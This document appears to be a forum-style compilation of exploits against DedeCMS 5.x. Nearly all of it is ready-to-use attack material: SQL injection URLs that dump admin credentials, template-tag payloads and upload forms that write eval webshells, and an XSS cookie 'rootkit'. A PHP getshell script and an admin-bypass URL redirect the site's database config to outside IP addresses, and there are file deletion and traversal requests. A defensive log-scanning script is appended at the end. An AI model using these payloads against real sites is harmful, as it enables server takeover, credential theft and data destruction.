DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account, upload a piece of software, and enter the following in the "local address" field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, i.e. a one-line webshell is written directly.
DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; afterwards, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA value and you enter the site backend directly.

This vulnerability requires knowing the admin backend path first.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, log in to the member area, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend gif89a if the image format is restricted):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the constructed part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

Note on the plus/advancedsearch.php result listed above: the stored password is the 32-character MD5 with the first 5 and last 7 characters removed, which gives a 20-character MD5; removing 3 more from the front and 1 from the end gives the 16-character MD5.
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits an error raised by a MySQL numeric field overflow, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown:

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
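As an added defensive example that is not part of the original post, the Python scanner below flags the request shapes collected on this page (the _COOKIE/_POST[GLOBALS] and cfg_ variable overrides, dede: template tags, updatexml/union injections, the gotopage script injection and ../ traversal) in web-server access-log lines; the log format, the sample lines and the 203.0.113.x addresses are constructed for the example, and form POST bodies are not visible in such logs, so only the GET-style variants above are caught.

```python
"""Scan access logs for the DedeCMS request patterns listed on this page.
Log lines and addresses are constructed; adapt LOG_RE to your log format."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameter names a client must never be allowed to set: the variable-override
# family (_COOKIE[GLOBALS][cfg_dbhost], _POST[GLOBALS][cfg_dbuser], ...) and
# bare cfg_* overrides (cfg_basedir, cfg_imgtype in the select_soft_post form).
OVERRIDE_KEY = re.compile(r"^(?:_(?:GET|POST|COOKIE|REQUEST|SERVER)\b|GLOBALS\b|cfg_)", re.I)

# Payload shapes seen on this page, checked against "key=value" after URL-decoding
# (the rss.php injection lives in the parameter *name*, so keys are scanned too).
VALUE_PATTERNS = {
    "dede-template-tag": re.compile(r"\{/?dede:\w+|runphp\s*=\s*['\"]?yes", re.I),
    "sql-injection": re.compile(
        r"\bunion\s+select\b|\bupdatexml\s*\(|\bfrom\s+dede_admin\b|\bselect\b.{0,200}?\bfrom\b", re.I),
    "xss-script": re.compile(r"<script|string\.fromcharcode", re.I),
    "path-traversal": re.compile(r"(?:\.\./){2,}"),
}

# Endpoints from the page that take attacker-controlled SQL, templates or config.
SENSITIVE_PATHS = ("/plus/advancedsearch.php", "/plus/mytag_js.php",
                   "/data/mysql_error_trace.php", "/include/dialog/select_soft_post.php")

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(target: str) -> list[str]:
    """Return findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    if path.endswith(SENSITIVE_PATHS):
        findings.append(f"sensitive-endpoint:{path}")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if OVERRIDE_KEY.match(key):
            findings.append(f"variable-override:{key}")
        blob = f"{key}={value}"  # parse_qsl already URL-decoded both halves
        for name, pattern in VALUE_PATTERNS.items():
            if pattern.search(blob):
                findings.append(f"{name}:{key[:40]}")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, target, findings) for every log line with findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m["target"])
            if findings:
                hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample lines (203.0.113.0/24 is documentation address space).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2012:10:01:02 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2012:10:01:07 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE[GLOBALS][cfg_dbhost]=203.0.113.77&nocache=true HTTP/1.1" 200 88
203.0.113.9 - - [12/Mar/2012:10:01:11 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4012
203.0.113.9 - - [12/Mar/2012:10:01:15 +0800] "GET /plus/rss.php?tid=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20x),1)%23'][0]=1 HTTP/1.1" 500 0
203.0.113.9 - - [12/Mar/2012:10:01:20 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0
203.0.113.9 - - [12/Mar/2012:10:01:25 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 301
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target[:60], findings)
```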